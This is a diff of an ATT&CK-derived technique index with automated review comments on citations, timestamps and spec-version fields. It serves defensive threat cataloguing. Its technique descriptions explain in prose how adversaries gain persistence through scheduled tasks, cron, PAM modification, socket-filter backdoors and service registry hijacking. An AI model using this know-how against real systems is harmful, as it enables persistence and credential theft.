and [Net](https://attack.mitre.org/software/S0039).
@@ -27163,17 +27545,16 @@ execution:
url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1569.002
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -27236,7 +27617,7 @@ execution:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -27270,8 +27651,8 @@ execution:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -27280,6 +27661,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
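Review bot: The new `Malicious Life by Cybereason` URL ends in `#blog-subscribe`, a fragment that points at the page's subscription widget rather than the article; drop it so the link lands on the content. The entry is also dated `(n.d.)`; if the post carries a publication date, record it to match the dated citations around it.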
@@ -27292,29 +27677,29 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
persistence:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
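Review bot: The rewritten description introduces two new citation keys, `(Citation: Stack Overflow)` and `(Citation: Red Canary - Atomic Red Team)`, so the T1053.005 object's external_references must contain entries whose `source_name` matches each key byte-for-byte (including the spaced hyphen) or the citations dangle. Minor: the text writes `Powershell` rather than `PowerShell`; since this description mirrors the ATT&CK object (see the attack.mitre.org links and x_mitre_ fields), that should be corrected upstream, not by hand in this index.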
@@ -27361,7 +27746,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -27393,8 +27778,8 @@ persistence:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27408,6 +27793,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
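Review bot: The new `Red Canary - Atomic Red Team` reference points at `atomics/T1053.005/T1053.005.md` in this same repository, so the index now cites the repo it indexes; that is what the upstream object does, but it is worth a line in the PR description so nobody later "fixes" the circular link. The `source_name` here must match the `(Citation: Red Canary - Atomic Red Team)` key used in the T1053.005 description exactly.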
@@ -27420,16 +27809,19 @@ persistence:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
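Review bot: The `modified` timestamp for T1205.002 moves backwards (`2022-11-08T14:00:00.188Z` to `2022-10-20T19:56:18.579Z`), and the same pattern recurs across this diff wherever the old value ends in `T14:00:00.188Z`; that suffix looks like a release-wide stamp, so the new per-object values are likely the more accurate ones, but any consumer that uses `modified` to detect changed techniques will flag these objects as updated even though their content is unchanged. State this in the PR description.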
@@ -27492,7 +27884,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037:
technique:
@@ -27557,49 +27948,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -27614,20 +27966,57 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1574.007:
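Review bot: `x_mitre_permissions_required: [root]` is removed from T1556.003 and nothing re-adds it, whereas every other removed field in this object (platforms, domains, contributors, id, created, created_by_ref, all six external_references) is only reordered and comes back intact; the permissions field is the one real data loss in this reorder. Confirm the upstream object really dropped it and that nothing reading this index keys off `x_mitre_permissions_required`, since other objects in the same file (T1542.005 with `Administrator`, T1053.003 with `User`) still carry it.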
@@ -27717,7 +28106,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -27805,7 +28193,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -27890,11 +28277,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -27972,7 +28358,6 @@ persistence:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1546.006:
@@ -28005,7 +28390,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -28028,11 +28413,10 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -28090,9 +28474,8 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests:
- name: ListCronjobs
@@ -28242,12 +28625,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -28266,7 +28648,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -28280,7 +28661,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -28307,8 +28687,8 @@ persistence:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -28339,7 +28719,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
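Review bot: Read together with the earlier removals of `x_mitre_attack_spec_version: 2.1.0` and `x_mitre_modified_by_ref` from the T1574.011 object, these two added lines are a move plus a bump (2.1.0 to 3.2.0), not new fields; the modified_by_ref value is unchanged. No action beyond confirming the final object carries exactly one of each key.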
@@ -28396,11 +28777,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
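Review bot: T1542.003 keeps `x_mitre_attack_spec_version: 3.1.0` as unchanged context while its `spec_version` is removed, yet T1053.007 is bumped from 3.1.0 to 3.2.0 elsewhere in this diff; if the values are mirrored per object from the upstream bundle that is fine, otherwise the bump was missed here. Check against the source bundle.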
@@ -28472,9 +28852,9 @@ persistence:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -28490,12 +28870,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -28570,7 +28949,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1542.005:
@@ -28613,7 +28991,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28637,8 +29015,6 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1543.003:
technique:
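Review bot: For T1542.005 both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed and no `x_mitre_attack_spec_version` is re-added (compare T1574.011 and T1098.003, which receive `3.2.0` in this diff), so this object ends up with no spec version key at all. Verify whether that is the upstream state or a dropped line.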
@@ -28793,31 +29169,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -28834,6 +29190,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -28844,9 +29201,13 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -28854,17 +29215,37 @@ persistence:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1137:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
